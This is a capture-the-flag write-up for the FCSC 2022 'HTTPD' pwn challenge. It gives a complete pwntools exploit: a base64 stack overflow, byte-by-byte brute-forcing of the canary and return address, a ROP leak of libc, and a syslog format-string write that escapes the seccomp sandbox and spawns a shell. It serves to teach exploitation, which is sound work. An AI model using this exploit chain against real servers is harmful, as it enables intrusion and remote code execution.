[FCSC 2022] Pwn - HTTPD (⭐⭐⭐)

Description

On vous demande d’auditer ce serveur web sandboxé.

nc challenges.france-cybersecurity-challenge.fr 2058

Note : le binaire à exploiter n’a pas accès à Internet.

Translation:

We ask you to audit this sandboxed web server.

nc challenges.france-cybersecurity-challenge.fr 2058

Note : the binary to exploit has no access to Internet.

The source code

The source code is available with this challenge. We have the following files:

audit.c / audit.h
- Contains the audit function. Apparently just logging things. If it’s here, it might be useful at some point, so don’t forget to check it out.
base64.c / base64.h
- Contains the b64_decode function. By looking at the function signature, it seems like there is no check for the output buffer size. It smells like a buffer overflow 👀.
debug.h
- Define a macro for logging debug messages. There may be some format string in there, so don’t forget to check it out.
http.c / http.h
- Contains the main functions for parsing the HTTP request and sending the response. I think this is just about programming the web server and nothing really interesting. Might still be useful to check it out in order to understand better the code.
worker.c / worker.h
- Seems to contain the code that manages how the web server is actually running.
httpd.c
- Contains the main function for the web server (calling the worker function) and the sandbox activation.

Test the code

We have an overview of the code. But we still don’t know what it does. So, let’s try to run the code.

1

$ ./httpd

And know, the program is hanging. It seems like no socket is created, which seems weird for a web server. By looking at the code, we can see the program just use the standard input and output.

1

$ nc -lvp 8080 -e ./httpd

Now we can communicate with the server through a web browser, on http://localhost:8080.

Authentication

When we open the page, we are asked for a username and a password.

First thing every hacker would do is to type admin and admin in the form. And of course, it works 🙃.

We like memes here 🙂

But we still don’t have the flag, so we need to search for a better vulnerability.

You said base64?

As we seen in the source code, there is a b64_decode function:

1

bool b64_decode(const char *in, size_t size, char *out);

And as I said before, we don’t give the size of the output buffer to the function. There are two possible scenarios:

The size is hardcoded in the function (which is not a good idea).
The function doesn’t care about the size of the output buffer (which is even worse).

I don’t want to read the entire source code, so let’s just read the important parts and try to overflow the buffer.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


bool checkAuth(const char *b64, struct shared *shared)
{
	char creds[0x100] = {};

	if(true != b64_decode(b64, strlen(b64), creds)) {
		askAuth("Malformed base64");
		return false;
	}

	DEBUG("creds = %s\n", creds);

    /*
    ...
    */
}

Here, in the worker.c file, we can see that the creds buffer is 0x100 bytes long. Let’s try to overflow it, by sending this request:

GET / HTTP/1.1
Authorization: Basic YWRtaW46YWRtaW4AYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYQ==

The base64 encode the string admin:admin\0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...aaaaaaaaa (where the \0 is the null terminator). It’s probably useless to send admin:admin, but since I didn’t really read the source code yet, I prefer to send it in order to get logged in if this is useful.

1
2


$ printf 'GET / HTTP/1.1\r\nAuthorization: Basic YWRtaW46YWRtaW4AYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYQ==\r\n\r\n' | ./httpd

And we got no answer, so it seems that the program has crashed as we expected.

Just a buffer overflow 😏

We found a vulnerability, so let’s try to exploit it.

1
2
3
4
5


from pwn import *

context.binary = elf = ELF('./httpd')
libc = ELF('./libc.so.6')
ld = ELF('./ld-linux-x86-64.so.2')

[*] '/home/lucas/CTF/FCSC/Pwn/httpd/write_up/httpd'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/lucas/CTF/FCSC/Pwn/httpd/write_up/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/lucas/CTF/FCSC/Pwn/httpd/write_up/ld-linux-x86-64.so.2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

Sadly, the program has every security feature enabled, so we can’t just send a buffer overflow. The only way I see in order to bypass ASLR / PIE / Canary is to bruteforce everything byte by byte in order to leak the data we need.

By looking a bit more at the source code, we find some code about the keepalive feature:

1
2
3
4
5
6
7
8
9


static inline bool shouldKeepAlive(const struct http_request *req)
{
	struct http_header *header = http_findHeader(req, "connection");

	if(NULL == header)
		return false;

	return 0 == strcasecmp(header->value, "keep-alive");
}

The main loop (in the parent process):

1
2
3
4
5
6


/* Main loop */
do {
    int status = request(shared);
    DEBUG("status = %d\n", status);
    audit(shared, status);
} while(shared->keepalive);

And the requests are handled in child processes (forked from the parent process):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


static int request(struct shared *shared)
{
	pid_t pid = fork();

	if(0 > pid) {
		perror("fork");
		exit(EXIT_FAILURE);
	}

	if(0 == pid) {
		sandbox(shared);
		_exit(EXIT_FAILURE);
	}

	int status;
	if(pid != waitpid(pid, &status, 0)) {
		perror("waitpid");
		exit(EXIT_FAILURE);
	}

	return status;
}

So we can bruteforce everything like we wanted if we add the header Connection: keep-alive.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60


from base64 import b64encode

p = remote("challenges.france-cybersecurity-challenge.fr", 2058, level='error')


def test_payload(payload, timeout=.1):
    p.send(b'GET / HTTP/1.1\r\nconnection: keep-alive\r\nAuthorization: Basic ' +
           b64encode(payload) + b'\r\n\r\n')
    return p.recv(timeout=timeout)


## Bruteforce the offset
offset = 0x100

offset_log = log.progress('Offset')

while test_payload(flat({0: b'admin:admin\0', 0x100: b'A' * (offset - 0x100)})):
    offset_log.status(str(offset))
    offset += 1

offset -= 1

offset_log.success(str(offset))


## Bruteforce the canary
canary_log = log.progress('Canary')

canary = b'\x00'
while len(canary) != 8:
    tmp = 0
    while not test_payload(flat({0: b'admin:admin\0', offset: canary + p8(tmp)})).startswith(b'HTTP/1.1 200 OK'):
        canary_log.status('0x%x' % u64((canary + p8(tmp)).ljust(8, b'\0')))
        tmp += 1
        tmp %= 256
    p.recv(timeout=1)

    canary += p8(tmp)

canary_log.success('0x%x' % u64(canary.ljust(8, b'\0')))


## Bruteforce the RIP
rip_log = log.progress('RIP')

rip = b'\x9e'
while len(rip) != 6:
    tmp = 0
    while not test_payload(flat({0: b'admin:admin\0', offset: canary, offset + 16: rip + p8(tmp)})).startswith(b'HTTP/1.1 200 OK'):
        rip_log.status('0x%x' % u64((rip + p8(tmp)).ljust(8, b'\0')))
        tmp += 1
        tmp %= 256
    p.recv(timeout=1)

    rip += p8(tmp)

rip_log.success('0x%x' % u64(rip.ljust(8, b'\0')))

p.recv(timeout=1)

[+] Offset: 264
[+] Canary: 0x87f031db50917e00
[+] RIP: 0x6160213fb89e

So, we bruteforced the canary and the return address. You can see that I have hardcoded the least significant byte of the canary to 0x00, and the one from the return address to 0x9e (which can be obtained by disassembling the program).

We can now get the base address of our program, from the leaked return address:

1
2
3
4
5


base = u64(rip.ljust(8, b'\0')) - 0x289e

elf.address = base

info("Base: 0x%x" % base)

[*] Base: 0x6160213f9000

THE RCEEEEE !!!!!!!!!!

Yeah ! We got the RCE ! We can execute code on the remote server by overwriting the return address with the address of the function we want to execute ! This is awesome !!!

But …

The sandbox …

Yes, we can execute functions .. but this is still sandboxed.

I gave you a meme .. so read my write up please 🙂

According to the seccomp configuration, we can only execute the following syscalls:

SYS_read
SYS_write
SYS_sigreturn
SYS_exit
SYS_brk

This was my first time dealing with seccomp, so I didn’t really know what I could do about these restrictions …

The wrong way

After a bit of research I found that the strict mode of seccomp is what we have here, except for SYS_brk. I then spent some hours searching why is SYS_brk disabled in the strict seccomp configuration. Is it dangerous ? Can we exploit something using it ?

I never got an answer about this, so I think there is no specific reason for this. They just enabled the essential syscalls, and didn’t care about the rest.

The right way

I realized, after some hours, that the seccomp configuration is not applied everywhere. The parent process needs to fork itself in order to handle the requests. So, the sandbox cannot be applied to the parent process.

And what if there is another vulnerability ? One that can be exploited in the parent process, from a child process ?

Finally reading the source code ?

The parent process does few things, so if there is a vulnerability, it should be easy to find.

Main loop:

1
2
3
4
5
6


/* Main loop */
do {
    int status = request(shared);
    DEBUG("status = %d\n", status);
    audit(shared, status);
} while(shared->keepalive);

There are 3 things:

request: the function that handles the requests
- Need to be checked, there might be a vulnerability in it
DEBUG: the macro that prints some debug information
- As I said before, we need to check for format string vulnerabilities, but in the given code, it seems like it is correctly used
audit: the function that logs some information
- Do you remember when I said that this should be useful at some point ? Let’s see if we can find a vulnerability in it. I’m pretty confident about this, so let’s check it first.

The audit function

The audit function is pretty simple:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35


void audit(const struct shared *shared, int status)
{
	/* Do not log failed attempts, exit early */
	if(WIFEXITED(status) && !shared->loggedin)
		return;

	/* Initialize the logger */
	static bool init = false;

	if(!init) {
		openlog(IDENT, 0, LOG_DAEMON);
		init = true;
	}

	/* Determine the message and priority */
	char msg[0x200];
	int prio;

	if(WIFEXITED(status)) {
		/* Keep track of connections in the audit log */
		snprintf(msg, sizeof(msg), "LOGIN %s", shared->username);
		prio = LOG_NOTICE;
	} else if(WIFSIGNALED(status)) {
		/* Signal ? We should warn about this */
		snprintf(msg, sizeof(msg), "SIGNAL %d", WTERMSIG(status));
		prio = LOG_WARNING;
	} else {
		/* ??? */
		snprintf(msg, sizeof(msg), "UNKNOWN %d", status);
		prio = LOG_CRIT;
	}

	/* Send the actual message to the logger */
	syslog(prio, msg, 0);
}

It manages the msg buffer, and the prio variable, in order to print the correct message after each loop.

I don’t see any buffer overflow on the msg buffer, so I think it’s pretty safe.

But at the end of the function, we have a syslog call. I don’t know this function, I never used it, so let’s read the manpage:

1

void syslog(int priority, const char *format, ...);

Hum … are you telling me that there is a format string vulnerability ? Let’s try in a custom program if we can exploit this using %n like we do all the time if printf:

1
2
3
4
5
6
7
8


#include <stdio.h>
#include <syslog.h>

int main(){
	int v = 0xdeadbeef;
	syslog(LOG_CRIT, "Hello %n", &v);
	printf("%x\n", v);
}

And the program prints 6, so the format string works as expected.

Triggering the format string

We have to control the content of the msg buffer, passed to syslog, in order to trigger the format string.

There are multiple cases:

Normal connection:
- The message is LOGIN <username> (the username is always admin since this is the only user we have)
Signal:
- The message is SIGNAL <signal>, we do not control the signal number, and even if we did, this would not allow us to trigger the format string.
Unknown:
- The message is UNKNOWN <status>, we do not control the status, and even if we did, this would not allow us to trigger the format string.

So, the only way to trigger the format string is to control the username. It is stored in the shared structure, which is shared between the parent and the child processes. If we could use our buffer overflow to trigger a ROP chain that would allow us to control the username, we would be able to trigger the format string, and then control the return address of the parent process, which would allow us to execute arbitrary code.

THE RCEEEEE !!!!!!!!!! (for real this time ?)

Leaking the libc base address

We need to know where the libc is loaded in memory. We will use this information to find the address of a one gadget (a single gadget that trigger execve("/bin/sh", NULL, NULL)) and the address of the stack (from the _environ symbol) in order to overwrite the return address.

We also could have checked for the libc version, and if it is old enough, we could have tried to use __free_hook or __malloc_hook to trigger the one gadget, but this might be harder, and this is not reliable for every libc, so I tend to avoid it nowadays when this is possible.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26


@MemLeak.String
def leak(addr):
    rop = ROP(elf)
    rop.puts(addr)
    rop.exit(0)
    payload = flat({
        0: b'admin:admin\0',
        offset: canary,
        offset + 16: rop
    })

    return test_payload(payload, 1)[:-1]


free_addr = u64(leak[elf.got.free:elf.got.free + 8])

info("free: 0x%x" % free_addr)

libc.address = free_addr - libc.symbols.free

info("libc: 0x%x" % libc.address)

environ_addr = u64(leak[libc.symbols['__environ']                   :libc.symbols['__environ'] + 8])

info("environ: 0x%x" % environ_addr)

[*] Loaded 14 cached gadgets for './httpd'
[*] free: 0x74fe3b0d1740
[*] libc: 0x74fe3b03a000
[*] environ: 0x7ffc03bccbd8

Now, we can get the address of the shared structure, and where the return address is stored.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


shared_address = u64(
    leak[environ_addr - 0x110:environ_addr - 0x108]
)

info("shared: 0x%x" % shared_address)


# Print the username, in order to check that we have the correct address
username = leak(shared_address + 2)

info("username: %s" % username)

[*] shared: 0x74fe3b227000
[*] username: b'admin\x00'

Now, let’s search for a one gadget:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


$ one_gadget libc.so.6
0xde78c execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xde78f execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xde792 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

I already tested all of them, and the last one is working, so let’s use it in our exploit.

1

new_ret = libc.address + 0xde792

And exploit the format string in order to overwrite the return address.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


for i in range(8):
    ret = new_ret & 0xff
    new_ret >>= 8
    write = fmtstr.AtomWrite(environ_addr - 0x100 + i, 1, ret)
    a, b = fmtstr.make_payload_dollar(12, write, 8)
    payload = flat({
        0: a,
        16: b
    })

    rop = ROP(libc)
    rop.read(0, shared_address+4, len(payload))
    rop(rax=constants.SYS_exit, rdi=0)
    rop.raw(rop.syscall.address)

    test_payload(flat({
        0: b'admin:admin\0',
        offset: canary,
        offset + 16: rop,
    }))

    p.send(payload)

[*] Loaded 193 cached gadgets for './libc.so.6'

Now, we overwrote the return address, so we just have to get out of the main loop, by setting the keepalive variable to false, ie: not including the Connection: keep-alive header in the request.

1
2
3
4
5
6


p.send(b'GET / HTTP/1.1\r\n\r\n')

p.recv(timeout=1)
p.sendline(b'cat flag.txt')
flag = p.recv(timeout=1)
success("Flag: %s" % flag.decode())

[+] Flag: FCSC{d87c69143541ae0d3e43f8d65bff7072646cdc781167b89aedf0146cb20ed3cd}

Conclusion

This was a great challenge. When I saw it, I instantly wanted to solve it.

But of course, when I solve a challenge, the most important thing is what I learned from it.

What I learned

First thing, I didn’t know seccomp. I watched some videos and read some documentation, and I learned how powerfull it is if you want to create a sandbox. I don’t know if there is some ways to escape the sandbox by disabling it if it is not configured correctly, but I think I will try to read more documentation on this topic.

But the most important thing, that made me waste a lot of time, was the fact that I got stuck on the wrong idea. I wanted to use brk in order to bypass the sandbox, but I couldn’t. But during the recon, I found the audit function and I already knew that it would probably be useful (nothing is useless when you want to solve a challenge, when a piece of code is here, it is probably for a reason). So next time, when I need to search for what I can do, I will go back to what I found in the recon phase, instead of rushing headlong towards the first idea that I have